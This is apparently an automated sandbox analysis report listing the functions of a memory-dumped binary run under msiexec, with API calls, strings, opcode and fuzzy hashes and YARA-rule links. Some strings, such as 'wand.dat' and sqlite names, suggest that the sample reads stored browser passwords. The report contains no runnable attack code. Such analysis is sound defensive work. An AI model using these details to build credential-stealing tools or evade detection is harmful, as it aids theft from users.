                                                                                        • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                        • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                        • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                        • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                        Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                        • String ID: MS Sans Serif
                                                                                        • API String ID: 210187428-168460110
                                                                                        • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                        • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                        Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcsicmpmemset
                                                                                        • String ID: edit
                                                                                        • API String ID: 2747424523-2167791130
                                                                                        • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                        • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                        • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                        • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                        Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                        • API String ID: 3150196962-1506664499
                                                                                        • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                        • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                        • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                        • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                        Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 3384217055-0
                                                                                        • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                        • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                        • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                        • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                        Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 368790112-0
                                                                                        • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                        • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                        • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                        • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                        Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                          • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                          • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                          • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                        • GetMenu.USER32(?), ref: 00410F8D
                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                        • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                        • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                        • String ID:
                                                                                        • API String ID: 1889144086-0
                                                                                        • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                        • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                        • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                        • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                        Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                        • GetLastError.KERNEL32 ref: 0041810A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                        • String ID:
                                                                                        • API String ID: 1661045500-0
                                                                                        • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                        • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                        • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                        • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                        Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                        Strings
                                                                                        • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                        • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                        • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                        • API String ID: 1297977491-2063813899
                                                                                        • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                        • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                        • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                        • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                        Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040560C
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                        • String ID: *.*$dat$wand.dat
                                                                                        • API String ID: 2618321458-1828844352
                                                                                        • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                        • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                        Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                        • wcslen.MSVCRT ref: 00410C74
                                                                                        • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                        • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                        • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 1549203181-0
                                                                                        • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                        • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                        • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                        • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                        Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00412057
                                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3550944819-0
                                                                                        • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                        • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                        Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • free.MSVCRT ref: 0040F561
                                                                                        • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$free
                                                                                        • String ID: g4@
                                                                                        • API String ID: 2888793982-2133833424
                                                                                        • Opcode ID: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                                                                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                        • Opcode Fuzzy Hash: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                                                                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                        Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3510742995-2766056989
                                                                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                        Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                        • memset.MSVCRT ref: 0040AF18
                                                                                        • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1865533344-0
                                                                                        • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                        • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                        • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                        • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                        Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004144E7
                                                                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                          • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                        • memset.MSVCRT ref: 0041451A
                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1127616056-0
                                                                                        • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                        • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                        Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                        • memset.MSVCRT ref: 0042FED3
                                                                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: sqlite_master
                                                                                        • API String ID: 438689982-3163232059
                                                                                        • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                        • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                        • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                        • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                        Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                        • wcscpy.MSVCRT ref: 00414DF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3917621476-0
                                                                                        • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                        • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                        • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                        • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                        Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                        • _snwprintf.MSVCRT ref: 00410FE1
                                                                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                        • _snwprintf.MSVCRT ref: 0041100C
                                                                                        • wcscat.MSVCRT ref: 0041101F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                        • String ID:
                                                                                        • API String ID: 822687973-0
                                                                                        • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                        • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                        • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                        • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                        Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                        • malloc.MSVCRT ref: 00417459
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                        • free.MSVCRT ref: 0041747F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2605342592-0
                                                                                        • Opcode ID: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
